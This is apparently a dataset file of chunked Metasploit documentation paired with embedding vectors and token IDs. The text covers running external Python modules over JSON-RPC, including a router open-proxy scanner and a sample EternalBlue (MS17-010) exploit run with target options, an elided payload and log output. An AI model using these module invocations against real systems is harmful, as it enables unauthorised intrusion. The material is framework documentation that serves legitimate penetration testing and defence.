##152 - does not match " } } { " jsonrpc " : " 2. 0 ", " method " : " message ", " params " : { " level " : " debug ", " message " : " 127. 0. 0. 1 : 49152 - does not match with : bytearray ( b'xxxxx') " } } you can pipe the json - rpc request as well for automation purposes : echo'{ " jsonrpc " : " 2. 0 ", " id " : " 1337 ", " method " : " run ", " params " : { " rhosts " : [ " 127. 0. 0. 1 " ], " rport " : " 49152 " } }'| pythonpath =. / lib / msf / core / modules / external / python : $ pythonpath python3. / modules / auxiliary / scanner / wproxy / att _ open _ proxy. py the python external modules can be run directly with command line options : $ pythonpath =. / lib / msf / core / modules / external / python : $ pythonpath python3. 9. / modules / auxiliary / scanner / wproxy / att _ open _ proxy. py - - help usage : att _ open _ proxy. py [ - h ] - - rhosts rhosts [ - - rport rport ] [ action ] the arris nvg589 and nvg599 routers configured with at & t u - verse firmware 9. 2. 2h0d83 expose an un - authenticated proxy that allows connecting from wan to lan by mac address. positional arguments : action the action to take ( ['run'] ) optional arguments : - h, - - help show this help message and exit - - rport rport the target port, ( default : 49152 ) required arguments : - - rhosts rhosts the target address for example : pythonpath =. / lib / msf / core / modules / external / python : $ pythonpath python3. / modules / auxiliary / scanner / wproxy / att _ open _ proxy. py - - rhosts 127. 0. 0. 1 - - rport 49152 for exploit modules, the payload is encoded encoded using base64 and specified in a
[ 0.8197087645530701, -0.5203458070755005, -0.4099535048007965, 0.46739092469215393, -0.5746350288391113, 0.014370021410286427, -0.08980667591094971, 0.08536150306463242, 0.4752546548843384, 0.39090633392333984, 0.40746167302131653, 0.06890325993299484, 0.29947713017463684, -0.3686411380767822, -0.5587891340255737, -0.3028109669685364, -0.7335457801818848, -0.3757726550102234, -0.9384384155273438, 0.4414155185222626, 0.09868457913398743, 0.12367799133062363, -0.9100131988525391, -0.35192176699638367, -0.9359301328659058, 0.2656986713409424, 0.8559736609458923, 0.14345960319042206, 0.605620265007019, 0.10825525969266891, -0.18329517543315887, -0.6136254072189331, -0.1168508529663086, -0.3229004442691803, 0.2007940709590912, 0.028676334768533707, 1.0928579568862915, -0.8258596658706665, -0.4966880977153778, -0.6582383513450623, -0.21706591546535492, -0.4139083921909332, 0.008560542948544025, -0.55836021900177, -0.7043529748916626, -0.3004743456840515, 0.5121352672576904, 0.04390089213848114, 0.6924667954444885, -0.3007664978504181, -0.03422396630048752, 0.7726157903671265, 0.1563170999288559, 0.3342078924179077, -0.07682234048843384, -0.06263464689254761, -0.33736780285835266, -0.5758057832717896, -0.4705643951892853, 0.11468987166881561, -0.2505911588668823, 0.3409242033958435, 0.15380384027957916, -0.8421604633331299, 0.33345744013786316, 0.23921772837638855, 0.27308645844459534, -0.03861038386821747, -0.24637143313884735, -0.025422336533665657, 0.21807166934013367, 0.5877236127853394, -0.904785692691803, -0.4530371129512787, -0.28091001510620117, -0.06531886011362076, 0.2660437822341919, -0.6815476417541504, -0.2072790116071701, 0.756672203540802, -0.31015926599502563, 1.1305292844772339, 0.0611596517264843, -0.23561088740825653, -0.40999317169189453, -0.657396137714386, 0.3202681243419647, 0.32580089569091797, -0.48233723640441895, 0.4206145405769348, 0.19893749058246613, 0.23956124484539032, -0.748966634273529, -0.4074172079563141, 0.12074785679578781, 0.6166645288467407, -0.7376803159713745, 0.30258119106292725, 0.4681021571159363, -0.07900729775428772, 1.1671041250228882, 0.8511114120483398, -0.23222705721855164, -0.4367521405220032, -0.17239589989185333, 0.25339609384536743, 0.730660617351532, -0.44336917996406555, 0.15219111740589142, -0.026318278163671494, 0.773716926574707, -0.37481823563575745, 0.005899556912481785, -0.9087210297584534, -0.07212372869253159, 0.556736946105957, 0.6745947003364563, -0.40568238496780396, -0.7259966731071472, 0.4331856071949005, -0.15097476541996002, -0.29374411702156067, 0.10217956453561783, -0.45407912135124207, 0.5028221607208252, -0.16696666181087494, -0.05997641757130623, 0.3609439432621002, -0.878496527671814, -0.48854660987854004, -0.12440235912799835, 0.02580058015882969, 0.04583242908120155, 0.5799993872642517, -0.019253414124250412, 0.41918641328811646, -0.16837504506111145, 0.35964852571487427, 0.6815615892410278, -0.5641910433769226, 0.15668635070323944, 0.47549256682395935, -0.003399626584723592, 1.6524837017059326, 0.6800813674926758, -0.1632123589515686, -0.3419325351715088, 0.5515309572219849, -0.47703787684440613, 0.06556478887796402, -0.38621458411216736, -0.5745195150375366, 0.24254676699638367, -0.8016035556793213, -0.7787582278251648, 0.5145753026008606, 0.0637347474694252, 0.3040607273578644, -0.6522514224052429, 0.8955566883087158, -0.0394367054104805, 0.42689818143844604, -0.3226154148578644, 0.4968326687812805, -0.4500696361064911, 0.8010867238044739, -0.3240078389644623, -0.9409987926483154, -0.6929749846458435, -0.06257471442222595, 0.3122488856315613, 0.2021263688802719, 0.3287287652492523, -0.42393407225608826, 1.2933495044708252, 0.4792064130306244, 0.2529125213623047, -0.08938466757535934, -0.0146333621814847, 0.8130183219909668, -0.5775067806243896, 0.5385683178901672, 0.22162552177906036, 0.3860982656478882, 0.07953084260225296, 0.12378213554620743, 0.4020952582359314, -0.6327587962150574, -0.4503139853477478, -0.3089633285999298, 0.24018028378486633, 0.13620516657829285, -0.2722380459308624, 0.5957209467887878, 0.5634490847587585, -0.06853953003883362, -0.6614766716957092, 0.09219802170991898, -0.42567068338394165, -0.948101818561554, -0.7626917362213135, 0.5709416270256042, 0.23724161088466644, 0.7026963233947754, -0.5786877870559692, -0.2629573941230774, 0.23378199338912964, 0.6365609169006348, -0.05730165168642998, 0.714344322681427, 1.012579321861267, 0.14695365726947784, -0.775835394859314, 0.1298193335533142, -0.006521249655634165, 0.04096417874097824, -0.01618831790983677, 0.3334518074989319, 0.5352684259414673, 0.23255479335784912, 0.4572869837284088, 0.7960778474807739, 0.48670700192451477, 0.4998512268066406, -0.308589369058609, -0.6820963621139526, -0.04004647582769394, 0.5739981532096863, -0.2950171232223511, -0.15212523937225342, 0.3370760977268219, 0.2169051170349121, 0.06423317641019821, 1.220873236656189, 0.2541106045246124, -0.5386655330657959, 0.409533828496933, 0.6377989649772644, 0.31010115146636963, -0.027720466256141663, 0.17408967018127441, 0.9167348146438599, 1.0010451078414917, 0.051698386669158936, 0.38740357756614685, 0.5156245231628418, -0.19440416991710663, -0.5934779644012451, -0.0255849901586771, 0.7652795910835266, 0.12665793299674988, 1.0489181280136108, 0.37750211358070374, -0.2506844401359558, -0.5387333035469055, -0.680117666721344, 0.36780402064323425, 0.6351495385169983, -0.5863572955131531, -0.5762107968330383, 0.20229098200798035, -0.48288074135780334, -1.1084296703338623, -0.24242717027664185, 0.20479784905910492, 0.5236684083938599, -0.33022382855415344, 0.14801080524921417, -0.03278133273124695, -0.5005037188529968, -0.5351788401603699, -0.11074166744947433, -0.9506543278694153, -0.7993131279945374, -1.1020370721817017, 0.4784010350704193, 0.4454364776611328, -0.039820555597543716, 0.6731316447257996, -0.8878849148750305, -0.8206492066383362, -0.053079139441251755, -0.08502901345491409, 0.5695215463638306, -0.06979668885469437, -0.44117873907089233, -0.6767390370368958, 0.06104419752955437, -0.09914429485797882, 0.7248339056968689, -0.19904980063438416, -0.15912120044231415, -0.16000981628894806, -0.11561083048582077, 0.23849131166934967, -0.33178016543388367, 0.9846128821372986, -0.22490417957305908, -0.11406129598617554, 0.22281566262245178, -0.0703103169798851, 0.044412169605493546, 0.41447773575782776, -0.18152469396591187, -0.32731714844703674, 0.7507067322731018, 0.24282565712928772, -0.2832837402820587, 0.7056571245193481, 0.5391703844070435, -0.5644803047180176, 0.43314212560653687, 0.31610795855522156, 0.871068000793457, -0.7612718343734741, 0.1852235198020935, -0.0005161588778719306, 0.3525362014770508, 0.14481230080127716, -0.48977184295654297, 0.2053915113210678, -0.12112043797969818, 0.19428950548171997, -0.2765876054763794, -0.4714756906032562, 0.1405341625213623, -0.1833946853876114, -0.7530339360237122, 0.13679426908493042, -0.8812670111656189, -0.18736958503723145, -0.1787862926721573, -0.3974575698375702, 0.7654620409011841, 0.23705747723579407, 0.35689565539360046, -0.6584479808807373, -0.22123245894908905, 0.1445482075214386, 0.8049229979515076, 0.07129494845867157, -0.15537086129188538, 0.45308876037597656, 0.3370780944824219, -0.24834518134593964, 0.22667290270328522, -0.10303283482789993, -0.7326220870018005, -0.07152004539966583, -0.21633107960224152, -0.18843619525432587, -0.21452093124389648, 0.3139762580394745, 0.63163161277771, 0.48413872718811035, 0.4468299150466919, -0.5789265632629395, 0.17828714847564697, 0.2923653721809387, 0.5197739005088806, 0.4403139650821686, 0.47929900884628296, -0.17527996003627777, 0.04578528553247452, -0.6610103249549866, -0.7757230401039124, 0.14722737669944763, -0.019821634516119957, 1.0387506484985352, 0.07501470297574997, 0.6249125599861145, -0.04454633593559265, -0.5391976237297058, 0.5454505681991577, -0.0471326969563961, -0.5514670014381409, 0.39615657925605774, 0.11168511211872101, 0.6559448838233948, -0.22853922843933105, 0.3226012885570526, 0.20704840123653412, -0.20668749511241913, 0.05346253886818886, 0.07572531700134277, -0.04527949541807175, -0.47723516821861267, -0.9749977588653564, -0.4406091570854187, -0.45815983414649963, 0.45650142431259155, -0.20577341318130493, 0.29736095666885376, -0.28271785378456116, -0.6767634749412537, -0.24633020162582397, 0.9532110095024109, 1.0694249868392944, 0.667805016040802, 0.8704895973205566, 0.4500772953033447, 0.113196961581707, -0.36263585090637207, 0.29750752449035645, -0.21164143085479736, 0.729034423828125, -0.406373530626297, 0.8043051958084106, -0.20588980615139008, 0.28777366876602173, -0.5570555329322815, -0.3723664879798889, -0.10604844242334366, -0.1799122542142868, -0.04449428245425224, -0.08660892397165298, -0.7919089198112488, 0.21390807628631592, 0.3436741530895233, -0.27307409048080444, -0.13508272171020508, -0.5663581490516663, -0.010966417379677296, 0.685210108757019, 0.7623421549797058, -0.8247401714324951, 0.45321038365364075, -0.8902297616004944, -0.3048451244831085, 0.19394895434379578, -0.8886125087738037, -0.2951428294181824, -0.14511950314044952, -0.19178654253482819, -0.9171305894851685, 0.20844654738903046, 0.4106390178203583, -0.43904542922973633, -0.06892108917236328, -1.114978551864624, -0.4332796037197113, 0.4985411465167999, -0.3146243989467621, -0.5869472622871399, 0.10807442665100098, -0.14076870679855347, 0.18033282458782196, -0.021236468106508255, -0.3896663188934326, -0.030708640813827515, 0.14644861221313477, -0.09502510726451874, 0.18493476510047913, -0.6247225999832153, 0.10243621468544006, 0.5307128429412842, -1.2774842977523804, 0.001742156338877976, -0.25337985157966614, -0.6556100845336914, -0.07597304880619049, -0.10732672363519669, 0.052598655223846436, -0.3052753210067749, 0.013407896272838116, 0.6624683141708374, -0.5125917196273804, 0.16463631391525269, 0.2360249012708664, 0.14493751525878906, -0.3855961263179779, 0.33399805426597595, 0.13754135370254517, 0.3072323501110077, 0.04492894187569618, -0.4334447383880615, 0.9393361806869507, 0.5972028374671936, 0.12772820889949799, -0.03355848416686058, -0.8902891278266907, 0.5494499206542969, 0.10960657894611359, 0.5781194567680359, -0.6164939403533936, -0.7099536061286926, -0.3632427752017975, 0.790424108505249, -0.35159286856651306, 0.20039083063602448, 0.2136199176311493, -0.2971561551094055, 0.02716669999063015, -0.5894836783409119, -0.7218470573425293, -0.7371219396591187, -0.044617727398872375, -0.1277184784412384, 0.698050856590271, 0.03717978671193123, 0.7081656455993652, -0.6215655207633972, -0.5543268918991089, 0.906123161315918, -0.9712733626365662, -0.42361149191856384, -0.7431588768959045, 0.14773254096508026, -0.3607752323150635, 0.3250633478164673, -0.25126373767852783, 0.3161180317401886, -0.543455183506012, 0.7396366596221924, -0.42593878507614136, 0.5260644555091858, 0.43593502044677734, -0.2786738872528076, 0.13296811282634735, 0.37055784463882446, -0.3140968382358551, -0.9012300968170166, -0.11484228819608688, 0.7235868573188782, -0.12193360924720764, 0.10080906003713608, -0.07596678286790848, -0.02967710793018341, -1.099348545074463, -1.1469218730926514, 0.2684209644794464, -0.5604766011238098, 0.003773210570216179, -0.538032591342926, -0.9186550378799438, -0.4361177682876587, -0.2001364529132843, 0.17974227666854858, -0.8864346742630005, 0.17809922993183136, 0.0019220532849431038, 0.40549442172050476, -0.5239546895027161, 0.2404298037290573, -0.0034932498820126057, -0.24673661589622498, -0.13437120616436005, 0.6341821551322937, 0.12753264605998993, -0.5951837301254272, -0.09376337379217148, 0.5642298460006714, 0.06743841618299484, -0.19033057987689972, -0.5971431732177734, -0.34020674228668213, -0.37781399488449097, 0.30091243982315063, -0.8497716784477234, 0.7837315201759338, -0.43808287382125854, 0.4690110385417938, 0.11121820658445358, 0.3285870850086212, 0.3771883249282837, -0.40019524097442627, -0.1756686419248581, -0.07906930893659592, 0.958044707775116, -0.6606461405754089, -0.5775658488273621, 0.07500255852937698, 1.131380558013916, 0.5009340047836304, -0.11496634781360626, -0.27398407459259033, 0.11691286414861679, -0.3765721619129181, -0.6312994360923767, 0.5816085934638977, 0.4388611614704132, -0.4249463975429535, 0.016177251935005188, -0.04614420235157013, 0.8578177690505981, -0.15044386684894562, 0.7526088953018188, 0.9662351012229919, 0.29523584246635437, 0.5349709391593933, -1.0626347064971924, 0.33253154158592224, 0.41741079092025757, 0.005799680482596159, 0.1346638947725296, -0.013908992521464825, 0.11271950602531433, 0.06395862251520157, -0.550197958946228, -0.23676496744155884, 0.027673108503222466, -0.6901325583457947, 0.7893971800804138, -0.15232788026332855, 0.5925798416137695, -0.1674790382385254, -1.035089373588562, -0.45011526346206665, 0.6260111331939697, 0.21750058233737946, -0.40727171301841736, 0.2957693934440613, 0.06662668287754059, 0.2507852017879486, -0.27037689089775085, 0.29593566060066223, 0.0981726422905922, 0.28875842690467834, 0.4574132263660431, -0.26402154564857483, -0.6208441257476807, 1.0427515506744385, 0.04872375726699829, -0.939362645149231, -0.34577611088752747, -0.41338565945625305, -0.005806648638099432, -0.5585063099861145, -0.29647737741470337, 0.008085139095783234, 0.32943013310432434, 0.4951409101486206, -0.02393765188753605, 0.5571715831756592, 0.18071198463439941, -0.4450256824493408, -0.8088874816894531, -0.212681382894516, -0.2530122697353363, -0.1668330878019333, 0.3537333905696869, -0.47708919644355774, -0.3976679742336273, -0.6555328965187073, -0.4297536015510559, 0.05862966179847717, 0.07988131046295166, 0.908352792263031, -0.655860424041748, 0.7813880443572998, 0.18204666674137115, -0.07469531893730164, 1.0796794891357422, 0.4456910789012909, 0.41489940881729126, 0.3355410099029541, 0.37280815839767456, -0.5028586983680725, -0.11233669519424438, -0.1599448025226593, 0.24914610385894775, 0.4816126227378845, 0.39296141266822815, -0.08100558817386627, -0.15354886651039124, -0.004144659731537104, 0.20422649383544922, -1.1719365119934082, -0.6622539162635803, -1.0975691080093384, 0.010411381721496582, 0.6313828229904175, -0.4484943151473999, -0.4328755736351013, 0.1991802453994751, -0.1203605979681015, -0.38634541630744934, -0.28274911642074585, 0.07764706760644913, 0.41802456974983215, 0.05286514386534691, -0.6885729432106018, -0.6273984909057617, -1.0582070350646973, -0.4499759078025818, -0.25155070424079895, 0.05585861951112747, -0.41268572211265564, -0.5833355188369751, 0.16801249980926514, -0.31499072909355164, -0.18015018105506897, 0.4744831919670105, -0.4724939167499542, 0.0913815051317215, 0.09448932856321335, -0.4159086048603058, 0.4665468633174896, 0.7000524401664734, -0.10197445750236511, 0.20918673276901245, -0.010997818782925606, -0.04770796373486519, 0.7343078255653381, -0.48448649048805237, 0.2613101005554199, 0.19332058727741241, -0.19780877232551575, 0.6835229992866516, -0.3721238970756531, -0.555187463760376, 0.17597191035747528, -0.04576936364173889, -0.755181610584259, -0.46075963973999023, 0.11822490394115448, -0.4227442741394043, 0.05997662618756294, -0.22989687323570251, 0.37275975942611694, 0.5652740001678467, 0.5216622352600098, -0.14663714170455933, -0.734813928604126, 0.3113562762737274, 0.16146953403949738, -0.14794428646564484, -0.03134579584002495, -0.15362970530986786, 0.28188997507095337, -0.43270036578178406, 0.2540439963340759, -0.2091820389032364, -0.4300612807273865, 0.6210375428199768, -0.012439971789717674, 0.2332034707069397, -0.7878350019454956, -0.18923716247081757, 0.2836054563522339, 0.2175406664609909, 0.45866215229034424, 0.14152058959007263, 0.12005207687616348, 0.21599893271923065, -0.9268985390663147, 0.50466388463974, -0.9618834853172302, -0.1895856261253357, 0.044046077877283096, -0.7616293430328369, -0.40059247612953186, -0.766259491443634, -0.2958076298236847, -0.3706927001476288, 0.3873605728149414, -0.37268170714378357, 0.40651872754096985, 0.12212879955768585, 0.380295991897583, 1.393136739730835, -0.9992297291755676, -0.3899267911911011, -0.28105130791664124, 0.7722644805908203, -0.8293613791465759, -0.6163442134857178, 0.19740501046180725, 0.4854569137096405, 0.8928154110908508, -0.2334524393081665, -1.1025018692016602, -0.31532004475593567, 0.03270583227276802, 0.4155479073524475, 0.006680196151137352, 0.1830148845911026, -0.3285690248012543, 0.1406898945569992, -0.5804323554039001, -0.6185026168823242, -0.020400485023856163, -0.3282743990421295, 0.3843591511249542, -0.5234048366546631, -0.4332141876220703, 0.49333637952804565, -0.42629116773605347, -0.14319424331188202, 0.6594560742378235, 0.5348141193389893, -0.028312116861343384, -0.262123703956604, -0.028578782454133034, -0.3784524202346802, -0.08197204768657684, 0.4728088080883026, 0.48624569177627563, 0.35159382224082947, 0.5361984372138977, 0.7667956352233887, -0.5989446043968201, -0.3346637189388275, 0.30276015400886536, 0.7758606672286987, -0.3937700390815735, 0.15880006551742554, -0.14637385308742523, 0.2771098017692566, -0.07046978920698166, -0.11588861048221588, 0.46916988492012024, 0.5473085641860962, 0.04963851347565651, 0.22799281775951385, -0.19691425561904907, 0.5073994994163513, -0.7312259078025818, 0.2864832282066345, -0.1355416178703308, -0.19696038961410522, -0.21351084113121033, 0.019420797005295753, -0.22266411781311035, 0.33913111686706543, 1.2187881469726562, 0.7403396368026733, 0.17163841426372528, 0.8525794744491577, 0.14479878544807434, 0.5949510931968689, -0.35618817806243896, -0.29778116941452026, -0.6822860240936279, -0.20293839275836945, 0.0037116045132279396, -0.5966374278068542, -0.7503169178962708, 0.2672787010669708, 0.37563931941986084, 0.15904377400875092, 0.3916568160057068, 0.17913766205310822, 0.23473912477493286, -0.5646914839744568, 0.24763542413711548, -0.005562463775277138, -0.27315524220466614, 0.14979037642478943, 0.16716578602790833, -0.32184624671936035, 1.1513237953186035, 0.2622702419757843, 0.3596639931201935, 0.7384922504425049, 1.473999261856079, -0.13804872334003448, 0.7119659185409546, 0.21216684579849243, 0.0863041952252388, -0.5819888114929199, 0.27393847703933716, -0.31980976462364197, -0.6594743728637695, 0.6404964327812195, 0.2511211633682251, 0.4279789924621582, -0.5457032918930054, -0.06515093147754669, -0.6208392977714539, 0.23588448762893677, -0.38415950536727905, -0.292150616645813, 0.32816025614738464, -0.40158432722091675, -0.5342187881469727, 0.10331179946660995, 0.4113892912864685, 0.40632396936416626, -0.05504605174064636, -0.26055657863616943, -0.30608391761779785, -0.4602421522140503, -0.2424478828907013, 0.06844078749418259, 0.7632121443748474, -0.13175161182880402, -0.1683846414089203, 0.11885175853967667, -0.974902868270874, -0.10555961728096008, 0.5615183711051941, -0.37106451392173767, -0.0950474888086319, 0.45465758442878723, 0.6446356773376465, 0.3380356729030609, 0.5468749403953552, -0.3188500702381134, -0.3925992250442505, -0.15108507871627808, 0.914736807346344, 0.15021489560604095, 0.4160360097885132, 0.249038964509964, -0.04294465854763985, -0.20847691595554352, -0.5584362745285034, 0.632680356502533, 0.430772602558136, -0.010878846049308777, 0.1623174399137497, 0.453134685754776, -0.9387761354446411, -0.865236759185791, -0.28364384174346924, 0.060320015996694565, -0.022243134677410126, -0.3255149722099304, -1.146910309791565, -0.032615773379802704, 0.32260066270828247, 0.041707154363393784, -0.36731991171836853, 0.4051525890827179, 0.16108037531375885, -0.30891337990760803, -0.38215672969818115, -1.1506775617599487, 4.396844863891602, 0.4125925600528717, -0.04920980706810951, -0.20046286284923553, 0.27468952536582947, 0.6680788397789001, 0.7034981846809387, -0.2549688518047333, 0.3426055610179901, -0.362003892660141, 0.4102429449558258, -0.09556689113378525, 0.2221587747335434, 0.32239165902137756, 0.03821885585784912, 0.2019825577735901, -0.4675980806350708, 0.298478364944458, 0.1325635462999344, -0.6364345550537109, -0.8303429484367371, -0.46884575486183167, -0.4650644361972809, 1.3414998054504395, -0.09772785753011703, 0.5488036870956421, 0.15292717516422272, -0.2935236990451813, 0.337466835975647, -0.7057079076766968, 0.3997555077075958, -0.3585219085216522, 0.23415468633174896, -0.21998849511146545, 0.12745730578899384, -0.2998984456062317, -0.05280526354908943, -1.078906774520874, -0.4229848384857178, -0.409036248922348, 0.7185746431350708, 0.24336180090904236, 0.2954203188419342, -0.8810003995895386, 0.3750053346157074, 0.4036441743373871, -0.4912579655647278, 0.12028245627880096, 0.5530526638031006, -1.082505226135254, 0.18354791402816772, -0.2635226547718048, 0.5103943347930908, 0.4736321270465851, -0.2044616937637329, 0.498336523771286, 0.18500839173793793, -0.37811145186424255, -0.11273840069770813, 0.10662775486707687, 0.407420814037323, -0.5642092227935791, 0.35604119300842285, -0.058373160660266876, -1.0449382066726685, 0.8781449198722839, -0.5100747346878052, -0.3800491988658905, -0.2583502233028412, 0.21651344001293182, -0.20653657615184784, 0.30219772458076477, -0.37222719192504883, -0.32578667998313904, 0.6915555000305176, -0.22446021437644958, 0.21545004844665527, 0.12276842445135117, 1.020342469215393, -0.2672637701034546, -0.3591957688331604, -0.43203970789909363, -0.7894647717475891, 0.0584225133061409, 0.6148251295089722, 0.3033581078052521, -0.08136776089668274, -0.7129971981048584, -0.0004994996124878526, 0.08084534853696823, 0.2277430295944214, 0.3252323567867279, 0.05303579568862915, 0.5307846665382385, -0.35703244805336 ]
[ 16068, 2475, 1011, 2515, 2025, 2674, 1000, 1065, 1065, 1063, 1000, 1046, 3385, 14536, 2278, 1000, 1024, 1000, 1016, 1012, 1014, 1000, 1010, 1000, 4118, 1000, 1024, 1000, 4471, 1000, 1010, 1000, 11498, 5244, 1000, 1024, 1063, 1000, 2504, 1000, 1024, 1000, 2139, 8569, 2290, 1000, 1010, 1000, 4471, 1000, 1024, 1000, 13029, 1012, 1014, 1012, 1014, 1012, 1015, 1024, 4749, 16068, 2475, 1011, 2515, 2025, 2674, 2007, 1024, 24880, 2906, 9447, 1006, 1038, 1005, 22038, 20348, 2595, 1005, 1007, 1000, 1065, 1065, 2017, 2064, 8667, 1996, 1046, 3385, 1011, 1054, 15042, 5227, 2004, 2092, 2005, 19309, 5682, 1024, 9052, 1005, 1063, 1000, 1046, 3385, 14536, 2278, 1000, 1024, 1000, 1016, 1012, 1014, 1000, 1010, 1000, 8909, 1000, 1024, 1000, 14506, 2581, 1000, 1010, 1000, 4118, 1000, 1024, 1000, 2448, 1000, 1010, 1000, 11498, 5244, 1000, 1024, 1063, 1000, 1054, 15006, 3215, 1000, 1024, 1031, 1000, 13029, 1012, 1014, 1012, 1014, 1012, 1015, 1000, 1033, 1010, 1000, 1054, 6442, 1000, 1024, 1000, 4749, 16068, 2475, 1000, 1065, 1065, 1005, 1064, 18750, 15069, 1027, 1012, 1013, 5622, 2497, 1013, 5796, 2546, 1013, 4563, 1013, 14184, 1013, 6327, 1013, 18750, 1024, 1002, 18750, 15069, 18750, 2509, 1012, 1013, 14184, 1013, 9830, 1013, 26221, 1013, 1059, 21572, 18037, 1013, 2012, 2102, 1035, 2330, 1035, 24540, 1012, 1052, 2100, 1996, 18750, 6327, 14184, 2064, 2022, 2448, 3495, 2007, 3094, 2240, 7047, 1024, 1002, 18750, 15069, 1027, 1012, 1013, 5622, 2497, 1013, 5796, 2546, 1013, 4563, 1013, 14184, 1013, 6327, 1013, 18750, 1024, 1002, 18750, 15069, 18750, 2509, 1012, 1023, 1012, 1013, 14184, 1013, 9830, 1013, 26221, 1013, 1059, 21572, 18037, 1013, 2012, 2102, 1035, 2330, 1035, 24540, 1012, 1052, 2100, 1011, 1011, 2393, 8192, 1024, 2012, 2102, 1035, 2330, 1035, 24540, 1012, 1052, 2100, 1031, 1011, 1044, 1033, 1011, 1011, 1054, 15006, 3215, 1054, 15006, 3215, 1031, 1011, 1011, 1054, 6442, 1054, 6442, 1033, 1031, 2895, 1033, 1996, 12098, 6935, 1050, 2615, 2290, 27814, 2683, 1998, 1050, 2615, 2290, 28154, 2683, 2799, 2869, 26928, 2007, 2012, 1004, 1056, 1057, 1011, 7893, 3813, 8059, 1023, 1012, 1016, 1012, 1016, 2232, 2692, 2094, 2620, 2509, 14451, 2019, 4895, 1011, 14469, 4383, 24540, 2008, 4473, 7176, 2013, 14071, 2000, 17595, 2011, 6097, 4769, 1012, 2597, 2389, 9918, 1024, 2895, 1996, 2895, 2000, 2202, 1006, 1031, 1005, 2448, 1005, 1033, 1007, 11887, 9918, 1024, 1011, 1044, 1010, 1011, 1011, 2393, 2265, 2023, 2393, 4471, 1998, 6164, 1011, 1011, 1054, 6442, 1054, 6442, 1996, 4539, 3417, 1010, 1006, 12398, 1024, 4749, 16068, 2475, 1007, 3223, 9918, 1024, 1011, 1011, 1054, 15006, 3215, 1054, 15006, 3215, 1996, 4539, 4769, 2005, 2742, 1024, 18750, 15069, 1027, 1012, 1013, 5622, 2497, 1013, 5796, 2546, 1013, 4563, 1013, 14184, 1013, 6327, 1013, 18750, 1024, 1002, 18750, 15069, 18750, 2509, 1012, 1013, 14184, 1013, 9830, 1013, 26221, 1013, 1059, 21572, 18037, 1013, 2012, 2102, 1035, 2330, 1035, 24540, 1012, 1052, 2100, 1011, 1011, 1054, 15006, 3215, 13029, 1012, 1014, 1012, 1014, 1012, 1015, 1011, 1011, 1054, 6442, 4749, 16068, 2475, 2005, 18077, 14184, 1010, 1996, 18093, 2003, 12359, 12359, 2478, 2918, 21084, 1998, 9675, 1999, 1037 ]
metasploit
121.txt
4
top level payload _ encoded key, implemented here. below is an example of the ( now deleted ) ms17 _ 010 _ eternalblue _ win8. py module running : $ cat options. json { " jsonrpc " : " 2. 0 ", " id " : " 1337 ", " method " : " run ", " params " : { " verbose " : true, " rhost " : " 192. 168. 144. 131 ", " rport " : " 445 ", " groomallocations " : 13, " processname " : " spoolsv. exe ", " smbuser " : " test ", " smbpass " : " 123456 ", " payload _ encoded " : " / eid5pdozaaa... etc... = = = " } } $ cat options. json | pythonpath =. / lib / msf / core / modules / external / python : $ pythonpath python3 modules / exploits / windows / smb / ms17 _ 010 _ eternalblue _ win8. py { " jsonrpc " : " 2. 0 ", " method " : " message ", " params " : { " level " : " info ", " message " : " shellcode size : 1221 " } } { " jsonrpc " : " 2. 0 ", " method " : " message ", " params " : { " level " : " info ", " message " : " numgroomconn : 13 " } } { " jsonrpc " : " 2. 0 ", " method " : " message ", " params " : { " level " : " info ", " message " : " target os : windows 10 pro 10240 " } } { " jsonrpc " : " 2. 0 ", " method " : " message ", " params " : { " level " : " info ", " message " : " got good nt trans response " } } { " jsonrpc " : " 2. 0 ", " method " : " message ", " params " : { " level " : " info ", " message " : " got good nt trans response " } } { " jsonrpc " : " 2. 0 ", " method " : "
[ 0.5910583138465881, 0.16638904809951782, -0.8497171401977539, 0.8031846284866333, -0.6520899534225464, 0.13780969381332397, -0.18674300611019135, 0.004911770578473806, 0.3981131315231323, 0.8684443235397339, -0.051605600863695145, 0.12964032590389252, 0.1354488730430603, -0.4016578793525696, -0.7004745006561279, -0.006586271803826094, -0.18990005552768707, -0.09173985570669174, -0.7554252743721008, 0.18528853356838226, 0.28302162885665894, 0.6512930989265442, -0.928659975528717, -0.7693428993225098, -0.5005923509597778, 0.9255910515785217, 0.3733767569065094, 0.296982079744339, 0.9235590696334839, 0.7970717549324036, 0.29818540811538696, -0.006319428328424692, 0.18784299492835999, -0.4545120894908905, 0.11460600048303604, -0.3931318521499634, 0.763526201248169, -0.2386363297700882, -0.18300479650497437, -0.7842128276824951, 0.21406881511211395, -0.7675414681434631, -0.25949087738990784, -0.17485201358795166, -0.525099515914917, -0.23273484408855438, 0.861171305179596, -0.34834006428718567, 0.398717999458313, -0.5926318764686584, 0.16423894464969635, 0.12430146336555481, 0.3755192458629608, -0.06768003851175308, 0.09940066933631897, 0.10852322727441788, -0.7456997036933899, -0.3104396462440491, -0.43214407563209534, 0.5441465377807617, -0.1868673413991928, 0.3857201635837555, 0.19758152961730957, -0.8197658061981201, -0.2603270411491394, 0.1809891313314438, -0.08426858484745026, -0.054041530936956406, -0.7906920909881592, -1.1074178218841553, -0.4256729781627655, 0.7778224945068359, -0.9788892269134521, -0.7063176035881042, -0.9368179440498352, -0.31372445821762085, 0.04254002496600151, 0.007172334939241409, -0.48195886611938477, 0.5242005586624146, 0.09615037590265274, 0.6791373491287231, -0.13168174028396606, -0.3201594948768616, -0.24794761836528778, -0.4497879445552826, 0.19824810326099396, 0.276573121547699, -0.36009496450424194, 0.20479784905910492, 0.15745218098163605, 0.663507342338562, -0.8145230412483215, -0.39622145891189575, -0.23465442657470703, 0.39563947916030884, -0.07524141669273376, 0.18221960961818695, 0.16385383903980255, -0.44108322262763977, 0.17413072288036346, 0.822290301322937, 0.19498589634895325, 0.5334224104881287, 0.2418113350868225, 0.8254751563072205, 0.3586617112159729, 0.2514936029911041, -0.6155373454093933, -0.41059479117393494, 0.24193766713142395, -0.1314755231142044, 0.24146579205989838, -0.8807919025421143, 0.01129251066595316, 1.1026397943496704, 0.2035510390996933, 0.03904271870851517, -0.5234423875808716, 0.9119508862495422, -0.4167313277721405, -0.5332372188568115, 0.13833998143672943, -0.1683519184589386, -0.09256227314472198, -0.6550712585449219, 0.4551905393600464, 0.322502464056015, -0.23951636254787445, -0.2250596135854721, 0.07500804960727692, 0.051588304340839386, -0.2753441631793976, 0.3717878758907318, -0.7177156209945679, 0.26125070452690125, 0.30686458945274353, 0.18957975506782532, 1.225845456123352, -0.23648568987846375, 0.11464513093233109, 0.48603555560112, 0.15015237033367157, 1.2165411710739136, -0.42856675386428833, 0.1736302524805069, -0.4687550365924835, 0.008010338060557842, 